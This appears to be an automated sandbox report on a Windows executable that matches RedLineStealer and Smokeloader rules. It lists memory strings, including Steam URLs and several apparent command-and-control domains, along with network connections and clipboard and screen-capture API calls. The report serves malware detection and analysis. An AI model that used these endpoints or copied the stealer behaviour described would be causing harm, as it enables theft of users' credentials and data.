                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308346099.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2308517808.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://debonairnukk.xyz/apiow
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowere
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375237608.0000000000B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308346099.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2308517808.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/apiV
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308346099.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2308517808.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/apiam
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2308346099.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375273008.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/8
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375237608.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308346099.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2308517808.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/tucu
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.6:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49740 version: TLS 1.2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004310D0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004310D0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,0_2_00431839

                  System Summary

                  barindex
                  Source: 00000000.00000002.2375210203.0000000000AC9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0040B44C0_2_0040B44C
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004087900_2_00408790
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004260540_2_00426054
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043B0680_2_0043B068
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004140700_2_00414070
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043C0200_2_0043C020
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004398300_2_00439830
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043D8300_2_0043D830
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041B0E10_2_0041B0E1
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041F0E00_2_0041F0E0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004210E00_2_004210E0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004358900_2_00435890
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004340980_2_00434098
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043D0A00_2_0043D0A0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004180A90_2_004180A9
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0040A9400_2_0040A940
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041714B0_2_0041714B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0040C9170_2_0040C917
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0042B12C0_2_0042B12C
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0042F1300_2_0042F130
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0042B1C00_2_0042B1C0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041D9E00_2_0041D9E0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004361E00_2_004361E0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004111E50_2_004111E5
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004059F00_2_004059F0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004239F20_2_004239F2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043C1F00_2_0043C1F0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0040F9FD0_2_0040F9FD
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004259900_2_00425990
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043B9A10_2_0043B9A1
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004062500_2_00406250
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041D2700_2_0041D270
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00424A740_2_00424A74
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004092300_2_00409230
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00423A340_2_00423A34
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004192DA0_2_004192DA
